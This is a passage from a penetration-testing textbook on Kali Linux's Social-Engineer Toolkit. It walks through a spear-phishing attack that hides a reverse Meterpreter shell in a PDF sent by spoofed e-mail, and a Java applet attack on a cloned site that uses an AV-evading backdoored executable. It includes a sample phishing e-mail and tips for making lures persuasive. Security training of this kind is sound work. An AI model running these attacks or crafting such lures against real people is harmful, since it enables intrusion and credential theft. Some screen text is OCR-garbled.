In this chapter, we focused on the final stage of the attacker's kill chain — the 
command, control, and communications stage — where the attacker uses a persistent 
agent to communicate with a compromised system. 

That concludes the first part of this book where we examined the attacker's kill chain 
in detail to see how it could be applied towards compromising a network or an 
isolated system. 

In Part 2, The Delivery Phase , we will examine specific applications of the kill chain 
using various exploit paths. In Chapter 7, Physical Attacks and Social Engineering , we 
will focus on physical security and social engineering attacks. Topics will include 
an overview of the attack methodology, crafting hostile USB devices and rogue 
microcomputers, the Social Engineering Toolkit, and testing the resilience of a 
system to phishing attacks. 
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The Delivery Phase 

Physical Attacks and 
Social Engineering 

Exploiting Wireless 
Communications 

Reconnaissance and Exploitation 
of Web-based Applications 

Exploiting Remote Access 
Communications 

Client-side Exploitation 

Installing Kali Linux 



7 

Physical Attacks and 
Social Engineering 



Social engineering, especially when combined with physical access to the target 
system, is the single most successful attack vector used for penetration testing or 
an actual attack. 

As an attack route supporting the kill chain, social engineering focuses on the 
nontechnical aspects of an attack that take advantage of a person trust and innate 
helpfulness to deceive and manipulate them into compromising a network and 
its resources. 

The success of social engineering attacks relies on two key factors: 

• The knowledge that is gained during the reconnaissance phase. The attacker 
must know the names and usernames associated with the target; more 
importantly, the attacker must understand the concerns of the users on the 
network. 

• Understanding how to apply this knowledge to convince potential targets 
to activate the attack by clicking on a link, or executing a program. For 
example, if the target company has just merged with a former competitor, the 
job security of employees will likely be the top-of-mind concern. Therefore, 
e-mails or documents with titles associated with that subject will likely be 
opened by targeted individuals. 

Kali Linux provides several tools and frameworks that have an increased chance of 
success if social engineering is used as a pretext to influence victims to open files or 
execute certain operations. Examples include script attacks (includes Visual Basic, 
WMI, and PowerShell scripts), executables created by the Metasploit Framework, 

and the BeEF (The Browser Exploitation Framework). 




Physical Attacks and Social Engineering 

In this chapter, we'll focus on Social Engineering Toolkit or SEToolkit. The 
techniques used in employing these tools will serve as the model for using 
social engineering to deploy attacks from other tools. 

By the end of this chapter, you will learn how to use the SEToolkit to do 
the following: 

• Obtain a remote shell using spear phishing and Java applet attacks 

• Harvest or collect usernames and passwords using the credential 
harvester attack 

• Launch the tabnabbing and webjacking attacks 

• Employ the multi-attack web method 

• Use PowerShell's alphanumeric shellcode injection attack 

To support SET's social engineering attacks, the following general implementation 
practices will be described: 

• Hiding malicious executables and obfuscating the attacker's URL 

• Escalating an attack using DNS redirection 

You will also learn how to create and implement hostile physical devices based on 
the Raspberry PI microcomputer. 

Social Engineering Toolkit 

Social-Engineer Toolkit (SEToolkit) was created and written by David 
Kennedy (ReLIK), and it is maintained by an active group of collaborators 
(www . social - engineer . org). It is an open source python-driven framework 
that is specifically designed to facilitate social engineering attacks. 

A significant advantage of SEToolkit is its interconnectivity with the Metasploit 
Framework which provides the payloads needed for exploitation, the encryption 
to bypass anti-virus, and the listener module that connects to the compromised 
system when it sends a shell back to the attacker. 

Before launching SEToolkit, you may wish to make some modifications to the 
configuration file. 
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The social engineering toolkit is preconfigured with common default settings; 
however, these settings can be altered to adapt the kit to specific attack scenarios. In 
Kali, the configuration file is /usr/share/set/conf ig/set_conf ig. Modifying this 
file allows you to control the following: 

• Metasploit variables, including the location, the database to use, how many 
times a payload should be encoded, and commands to automatically run 
once a meterpreter session has been established. 

• Ettercap and dsniff switches to facilitate DNS redirection attacks and 
capture of authentication credentials. By controlling the DNS, an attacker 
can automatically direct groups of people to false sites created using the 
setoolkit. 

• Configuration of sendmail or other mail programs for use in attacks 
requiring spoofed e-mail addresses; this allows the social engineer to enhance 
the credibility of attacks by using an e-mail address that appears to come 
from a trusted source, such as a senior manager in the same company. 

• The e-mail provider to be used, including Gmail, Hotmail, and Yahoo. 

• Creating self-signed Java applets with a spoofed publisher, activating SSL 
certificates, and stealing digital signatures. 

• Other variables such as the IP address, port assignments, and encoding 
parameters. 

To open Social Engineering Toolkit (SET) in Kali distribution, go to Applications | 
Kali Linux | Exploitation Tools | Social Engineering Toolkit | setoolkit, or enter 
setoolkit at a shell prompt. You will be presented with the main menu, as shown 
in the following screenshot: 

Select from the menu: 

1) Social -Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 

5) Update the Social -Engineer Toolkit 

6) Update SET configuration 

7) Help, Credits, and About 

99) Exit the Social -Engineer Toolkit 
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If you select 1) Social-Engineering Attacks, you will be presented with the 
following submenu: 

Select from the menu: 

1) Spear-Phishing Attack Vectors 

2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 

5) Mass Mailer Attack 

6) Arduino-Based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 

9) QRCode Generator Attack Vector 

10) Powershell Attack Vectors 

11) Third Party Modules 

99) Return back to the main menu. 



The following is a brief explanation of the social engineering attacks : 

• Spear-Phishing Attack Vector allows an attacker to create e-mail 
messages and send them to targeted victims with attached exploits. 

• Website Attack Vectors utilize multiple web-based attacks, including 
the following: 

° Java Applet Attack Method spoofs a Java certificate and delivers a 
Metasploit-based payload. This is one of the most successful attacks, 
and it is effective against Windows, Linux, or OSX targets. 

° Metasploit Browser Exploit Method delivers a Metasploit 
payload using an iFrame attack. 

° Credential Harvester Attack Method clones a website and 
automatically rewrites the POST parameters to allow an attacker to 
intercept and harvest user credentials; it then redirects the victim 
back to the original site when harvesting is completed. 

° Tabnabbing Attack Method replaces information on an inactive 
browser tab with a cloned page that links back to the attacker. When 
the victim logs in, the credentials are sent to the attacker. 

° Web Jacking Attack Method utilizes iFrame replacements to make 
the highlighted URL link appear legitimate; however, when it is 
clicked, a window pops up, and is then replaced with a malicious link. 
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° Multi -Attack Web Method allows an attacker to select some or all 
of several attacks that can be launched at once, including The Java 
Applet Attack Method, The Metasploit Browser Exploit 
Method, Credential Harvester Attack Method, Tabnabbing 
Attack Method, and Man Left in the Middle Attack Method. 

• Infectious Media Generator creates an autorun . inf file and Metasploit 
payload. Once burned or copied to a USB device or physical media (CD or 
DVD) and inserted into the target system, it will trigger an autorun (if an 
autorun is enabled) and compromise the system. 

• The Create a Payload and Listener module is a rapid menu-driven 
method of creating a Metasploit payload. The attacker must use a separate 
social engineering attack to convince the target to launch it. 

• MassMailer Attack allows the attacker to send multiple customized e-mails 
to a single e-mail address or a list of recipients. 

• Arduino-Based Attack Vector programs Arduino-based devices, such 
as the Teensy. Because these devices register as a USB keyboard when 
connected to a physical Windows system, they can bypass security based 
on disabling the autorun or other endpoint protection. 

• SMS Spoofing Attack Vector allows the attacker to send a crafted Short 
Message Service text to a person's mobile device, and spoof the source of 
the message. 

• wireless Access Point Attack Vector will create a fake wireless access 
point and DHCP server on the attacker's system and redirect all DNS queries 
to the attacker. The attacker can then launch various attacks, such as the Java 
Applet Attack or a credential harvester attack. 

• QRcode Generator Attack Vector creates a QRCode with a defined URL 
associated with an attack. 

• Powershell Attack Vectors allow the attacker to create attacks that rely 
on PowerShell, a command-line shell and scripting language available on 
all Windows Vista and higher versions. 

• Third Party Modules allow the attacker to use the Remote Administration 
Tool Tommy Edition (RATTE), as part of a Java Applet Attack or as an 
isolated payload. RATTE is a text menu-driven remote access tool. 

SEToolkit also gives a menu item for Fast-Track Penetration Testing, which 
gives rapid access to some specialized tools that support brute force identification 
and password cracking of SQL databases, as well as some customized exploits 
that are based on Python, SCCM attack vectors, Dell computer DRAC/ chassis 
exploitation, user enumeration, and PSEXEC PowerShell injection. 
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The menu also gives options for updating the Metasploit Framework, SEToolkit, and 
the SEToolkit configuration. However, these additional options should be avoided as 
they are not fully supported by Kali, and may cause conflicts with dependencies. 

As an initial example of the SEToolkit's strengths, we'll see how it can be used to 
gain a remote shell — a connection made from the compromised system back to the 
attacker's system. 

Spear Phishing Attack 

Phishing is an e-mail fraud attack carried out against a large number of victims, 
such as a list of known American Internet users. The targets are generally not 
connected, and the e-mail does not attempt to appeal to any specific individual. 
Instead, it contains an item of general interest (for example, "Click here for bargain 
medications") and a malicious link or attachment. The attacker plays the odds that at 
least some people will click on the link attachment to initiate the attack. 

On the other hand, spear phishing is a highly specific form of phishing attack — by 
crafting the e-mail message in a particular way, the attacker hopes to attract the 
attention of a specific audience. For example, if the attacker knows that the sales 
department uses a particular application to manage its customer relationships, he 
may spoof an e-mail pretending that it is from the application's vendor with a subject 
line of "Emergency fix for <application> - Click link to download". 

The success rate of a phishing attack is typically less than five percent; 
however, the success rate of a spear phishing attack ranges from forty 
to eighty percent. This is why information from the reconnaissance 
phase is critical to the success of this type of attack. 

On average, only ten to fifteen e-mails need to be sent to a target 
before at least one is clicked on. _ 

Before launching the attack, ensure that sendmail is installed on Kali (apt- 

get install sendmail) and change the set_conf ig file from SENDMAIL=0FF to 

SENDMAIL=ON. 

To launch the attack, select Social Engineering Attacks from the main SEToolkit 
menu, and then select Spear- Phishing Attack Vectors from the submenu. This 
will launch the start options for the attack, as shown in the following screenshot: 
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The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (apt -get install sendmail) and change the config/set_config SENDMAIL=QFF 
flag to SENDMAIL=ON . 

There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 

1) Perform a Mass Email Attack 

2) Create a FileFormat Payload 

3) Create a Social -Engineering Template 



Select l to perform a mass e-mail attack; you will then be presented with a list of 
attack payloads, as shown in the following screenshot: 



********** PAYLOADS ********** 

1) SET Custom Written DLL Flijacking Attack Vector (RAR, ZIP) 

2) SET Custom Written Document UNC LM SMB Capture Attack 

3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 

4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 

5) Adobe Flash Player "Button" Remote Code Execution 

6) Adobe CoolType SING Table "uniqueName" Overflow 

7) Adobe Flash Player "newfunction" Invalid Pointer Use 

8) Adobe Collab .collectEmaillnfo Buffer Overflow 

9) Adobe Collab .get Icon Buffer Overflow 

10) Adobe JBIG2Decode Memory Corruption Exploit 

11) Adobe PDF Embedded EXE Social Engineering 

12) Adobe util .printf ( ) Buffer Overflow 

13) Custom EXE to VBA (sent via RAR) (RAR required) 

14) Adobe U3D CLODProgressiveMeshDecla ration Array Overrun 

15) Adobe PDF Embedded EXE Social Engineering (NOJS) 

16) Foxit PDF Reader v4 . 1 . 1 Title Stack Buffer Overflow 

17) Apple QuickTime PICT PnSize Buffer Overflow 

18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 

19) Adobe Reader u3D Memory Corruption Vulnerability 

20) MSCOMCTL ActiveX Buffer Overflow (msl2-027) 



One of the most effective attacks is 15) Adobe PDF Embedded EXE Social 
Engineering; however, the attack selected will vary with the attacker's knowledge 
of available targets gained during the reconnaissance phase. 



[ 177 ] 




Physical Attacks and Social Engineering 



When prompted to use your own PDF or a built-in blank PDF for the attack as 
shown in the following screenshot, select 2 for the built-in blank payload. You will 
then be prompted to select the payload. 



[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE. 

1. Use your own PDF for attack 

2. Use built-in BLANK PDF for attack 

set : payloads >2 

1) Windows Reverse TCP Shell 

2) Windows Meterpreter Reverse_TCP 

3) Windows Reverse VNC DLL 

4) Windows Reverse TCP Shell (x64) 

5) Windows Meterpreter Reverse_TCP (X64) 

6) Windows Shell Bind_TCP (X64) 

7) Windows Meterpreter Reverse HTTPS 



Spawn a command shell on victim and send back to attacker 
Spawn a meterpreter shell on victim and send back to attacker 
Spawn a VNC server on victim and send back to attacker 
Windows X64 Command Shell, Reverse TCP Inline 
Connect back to the attacker (Windows x64) , Meterpreter 
Execute payload and create an accepting port on remote system 
Tunnel communication over HTTP using SSL and use Meterpreter 



Through testing on multiple networks, we have found that options l and 2 
(Windows Reverse TCP shell, and Windows Meterpreter Reverse TCP) are 
the most reliable payloads. For this example, we will select windows Meterpreter 
Reverse TCP — when the PDF is opened, it will execute a reverse shell back to the 
attacking system. 

In instances where stealth is more important than reliability, windows Meterpreter 
Reverse HTTPS is the best option. 

SEToolkit will prompt for the payload listener (the attacker's IP address) and 
listening port, with the default port of 44 3 . 

The next menu prompts for changing the filename of the PDF file; the default name 
is moo . pdf, as shown in the following screenshot: 

set > IP address for the payload listener: 192.168.43.130 
set : pavloads > Port to connect back on [443] : 

[-] Defaulting to port 443... 

[-] Generating fileformat exploit... 

[*] Payload creation complete. 

[*] All payloads get sent to the /root/ .set/template .pdf directory 

[-] As an added bonus, use the file-format creator in SET to create your attachm 

ent . 

Right now the attachment will be imported with filename of 1 template .whatever 



Do you want to rename the file? 
example Enter the new filename: moo. pdf 

1. Keep the filename, I don't care. 

2. Rename the file, I want to be cool. 
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The default name will not likely entice a potential victim to open the file; 
furthermore, it may be identified by client-side security. For these reasons, 
the filename should be changed. The name should reflect the intended audience 
being attacked. For example, if you are targeting the finance group, give the PDF 
file a title such as Tax Law Amendments. 

You will now be offered the option of either attacking a single e-mail address, or 
mass-mailing (for example, an employee list of the target company, or a specific 
group within the company). Option l was selected for this example. 

SEToolkit will then prompt to use a predefined template or craft a one-time e-mail 
template. If you select a predefined template, the following options will be available: 



Do you want to use a predefined template or craft 
a one time email template. 

1. Pre-Defined Template 

2. One-Time Use Email Template 

set : phishina >l 

[-] Available templates: 

1 : WQAAAA !!!!!!!!!! This is c razy . . . 

2: Dan Brown's Angels 6 Demons 

3: Strange internet usage from your computer 

4: How long has it been? 

5: Baby Pics 

6: Have you seen this? 

7 : New Update 
8: Computer Issue 
9: Order Confirmation 
10: Status Report 
set : phishina >l O 

set : phishing > Send email to : j ohn@ta rget . com 



An effective social engineering attack is crafted for the target; therefore, select option 
2, One-Time Use Email Template, to create a one-time use e-mail template, as 
shown in the following screenshot: 



set : phishina >2 

set : phishina > Subject of the email: New email server 

r ' p ' [p] :pg> Send the message as html or plain? ' h 1 or 

n for a new line. Control+c when finished :n, hit return 

Next line of the body: The mail server will be replaced today with 

Next line of the body: a new version that is faster and (finally) 

Next line of the body: has more storage capacity. 

Next line of the body: Please review the attached document, which 

Next line of the body: outlines changes you must make to access 

Next line of the body: your account. You must make these changes to 
Next line of the body: ensure uninterrupted access to your email. 
Next line of the body: Bob Smith 
Next line of the body: Senior Mange r_ 
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You will be offered the option of using your own Gmail account to launch the attack 
(l) or use your own server or open relay(2). If you use a Gmail account, it is likely 
that the attack will fail, and you will receive the following message: 

[!] Unable to deliver email. Printing exceptions message 

below, this is most likely due to an illegal attachment. If using GMAIL 
they inspect PDFs and it is most likely getting caught. 

Gmail inspects outgoing emails for malicious files, and is very effective at identifying 
payloads produced by SEToolkit and the Metasploit Framework. If you have to send 
a payload using GMail, use Veil -Evasion to encode it first. 

It is recommended that you use the sendmail option to send executable files; 
furthermore, it allows you to spoof the source of the e-mail to make it appear as 
though it originated from a trusted source. 

The target will receive the following e-mail message: 



To robert.beggs@digitaldefence.ca 
.^Message | ^template, doc (230 B) 



The email server will be upgraded today after hours . 

The new server will be faster, have improved anti-virus, and give everyone more storage 
space for their emails. 

Please review the attached document for the changes that you will have to make BEFORE you 
can access your email tomorrow morning. 

don Smith, Network Manager 

DigitalDefence 

### - ### - #### (office) 



To ensure that an e-mail is effective, the attacker should take care of the 
following points: 

• The content should provide a "carrot" (the new server will be faster, have 
improved anti-virus) and a "stick" (changes you will have to make before you 
can access your e-mail). Most people respond to immediate calls for action, 
particularly when affects them. 

• In the sample given previously, the attached document is titled template . doc. 
In a real-world scenario, this would be changed to Email instructions . doc. 

• Ensure that your spelling and grammar are correct, and the tone of the 
message matches the content. 
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• The title of the individual sending the e-mail should match the content. 

If the target organization is small, you may have to spoof the name of a 
real individual and send the e-mail to a small group that does not normally 
interact with that person. 

• Include a phone number — it makes the e-mail look more "official", and there 
are various ways to use commercial voice over IP solutions to obtain a short- 
term phone number with a local area code. 

Once the attack e-mail is sent to the target, successful activation (the recipient 
launches the executable) will create a reverse Meterpreter tunnel to the attacker's 
system. The attacker will then employ Meterpreter and other tools to conduct typical 
post-exploitation activities. 

Using a website attack vector - Java Applet 
Attack Method 

The Java Applet Attack Method uses an infected Java applet to load a malicious 
application onto the target system. This attack is favored by many attackers 
because it is highly reliable, and it is effective against Windows, Linux, and 
Mac OS X systems. 

To launch the attack, open SEToolkit and select option 2 ) Website Attack 
Vectors, from the main menu. Then select option 1) Java Applet Attack Method, 
to launch the initial menu, as shown in the following screenshot: 

set : webattack >l 

The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 

The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 

The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality . 

1) Web Templates 

2) Site Cloner 

3) Custom Import 
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The options for web template are Java Required, Gmail, Google, Facebook, 
Twitter, and Yahoo. The Java Required page, as shown in the following screenshot, 
is usually effective because it directly prompts the user to update a vital piece of 
software before continuing. 



Java Required! 



Search the website 

Search 



Heme Services 



About Help Links 



Welcome to the website, you must htiva Java in ol der to view this passe properly. Ensure that the Microsoft 
signed Java box that pops up is accepted to load the site content. 



Words from our CEO "Java Required to view content." 

Instructions to view the website: 



Welcome to the site! This site requires 
Java in order lo run properly. 



1. A pop-up box will prompt, please hit N Yes". This may take a few 
moments. 

2 . Tins pop-up is signed throu gh Ihe Microsoil Corporation eiikI will 
provide you with accessary updates to view the site. 

3. Once you have accepted, wait about 10 lo 1? seconds and the page 
will load. 

You must first click “Run" for the signed Java component from 
Microsoft in order to view our site successfully. 



You can also choose to clone an existing site, such as the target's corporate website. 

After making the selection, the attacker is then prompted to determine if they use 
Port/ NAT forwarding and provide the IP address of the attacking machine for the 
reverse connection, as shown in the following screenshot: 

[-] NAT/Port Forwarding can be used in the cases where your SET machine is 

[-] not externally exposed and may be a different IP address than your reverse 1 

istener . 

set> Are you using NAT/Port Forwarding [yes|no]: no 

[-] Enter the IP address of your interface IP or if your using an external IP, w 
hat 

[-] will be used for the connection back and to house the web server (your inter 
face address) 

connection : 192 . 168 .43 . 130 or hostname for the reverse c 
[-] SET supports both HTTP and HTTPS 
[-] Example: http ://www. thisisafakesite .com 
aldefence .cak> Enter the url to clone : http : //www . digit 




Word wrapping is not well handled by the SEToolkit, and it is 
common that a typed response will wrap back and overwrite a 
part of the command line. 



] 
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After providing the required URL, SEToolkit will start the site cloning process, 
as shown in the following screenshot. When completed, the application will start 
generating the payload and supporting files (the . j ar archive and the cloned 
index . html file). 

[*] Cloning the website: http://www.digitaldefence.ca 

[*] This could take a little bit ... 

[*] Injecting Java Applet attack into the newly cloned website. 

[*] Filename obfuscation complete. Payload name is: nAo2ZBQkt9X 

[*] Malicious java applet website prepped for deployment 



The next stage includes the selection of the payload. If stealth is especially important, 
use option 17 to select an executable that has been encoded using veil, as shown in 
the following screenshot: 



1) Windows Shell Reverse_TCP 
d send back to attacker 

2) Windows Reverse_TCP Interpreter 
m and send back to attacker 

3) Windows Reverse_TCP VNC DLL 
end back to attacker 

4) Windows Bind Shell 
pting port on remote system 

5) Windows Bind Shell X64 
P Inline 

6) Windows Shell Reverse_TCP X64 
TCP Inline 

7) Windows interpreter Reverse_TCP X64 
ows x64) , interpreter 

8) Windows interpreter All Ports 
a port home (every port) 

9) Windows interpreter Reverse HTTPS 
ng SSL and use interpreter 

10) Windows interpreter Reverse DNS 
dress and spawn interpreter 

11) SE Toolkit Interactive Shell 
designed for SET 

12) SE Toolkit HTTP Reverse Shell 
encryption support 

13) RATTE HTTP Tunneling Payload 
tunnel all comms over HTTP 

14) ShellCodeExec Alphanum Shellcode 
ad through shellcodeexec 

15) Pylnjector Shellcode Injection 
ad through Pylnjector 

16) MultiPylnj ector Shellcode Injection 
payloads via memory 

17) Import your own executable 
able 



Spawn a command shell on victim ani 
Spawn a meterpreter shell on victi 
Spawn a VNC server on victim and s 
Execute payload and create an acce 
Windows x64 Command Shell, Bind TC 
Windows X64 Command Shell, Reverse 
Connect back to the attacker (Wind 
Spawn a meterpreter shell and find 
Tunnel communication over HTTP usi 
Use a hostname instead of an IP ad 
Custom interactive reverse toolkit 
Purely native HTTP shell with AES 
Security bypass payload that will 
This will drop a meterpreter paylo 
This will drop a meterpreter paylo 
This will drop multiple Metasploit 
Specify a path for your own execut 
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Select the encoding option to bypass local anti-virus on the target system; the most 
effective of them is the fourth option, Backdoored Executable, as shown in the 
following screenshot:. 

Select one of the below, 'backdoored executable 1 is typically the best. However, 
most still get picked up by AV . You may need to do additional packing/c rypting 
in order to get around basic AV detection. 

1) shikata_ga_nai 

2) No Encoding 

3) Multi-Encoder 

4) Backdoored Executable 



The application will prompt for the listening port, and then start generating code for 
common ports (2 5, 53, 8 0, 44 3, and so on) on the victim's machine, as shown in the 
following screenshot: 

set : encodinq >4 

set : pavloads > PORT of the listener [443] : 

[*] Generating x86-based powershell injection code for port: 22 

[*] Generating x86-based powershell injection code for port: 53 

[*] Generating x86-based powershell injection code for port: 443 

[*] Generating x86 -based powershell injection code for port: 21 

[*] Generating x86-based powershell injection code for port: 25 

[*] Finished generating powershell injection bypass. 

[*] Encoded to bypass execution restriction policy... 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 

[*] Backdoor completed successfully. Payload is now hidden within a legit execut 
able . 



Now comes the social engineering step — the attacker has to convince the targeted 
person to connect to the IP address of the listening system. If the target enters that 
system, they will be directed to the cloned site hosted on the listener. 
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The site will present the targeted person with a security warning, as shown in the 
following screenshot, indicating that an application needs to be executed in order to 
access the site. 

Security Warning 




If the person chooses to execute the application, a reverse shell (depending 
on the selected payload) will be formed between their computer and the 
attacker's computer. 

The two attacks presented demonstrate the different approaches used by the 
SEToolkit to gain control of a target's computer using a reverse shell or a similar 
payload. An attacker can extend the control in a number of ways, such as using 
a VNC payload or placing a RATTE. 

However, these attacks are intrusive — it is possible that the reverse shell may 
trigger an egress alarm at the firewall as it connects to the attacker's machine. 
More importantly, the payload may be reverse engineered to identify information 
about the attacker. 

Finally, the goal of the attack may not be an immediate compromise; instead, the 
attacker may wish to collect user credentials to support a later attack, or to reuse 
the credentials at multiple places on the Internet. So, let's examine a credential 
harvesting attack. 
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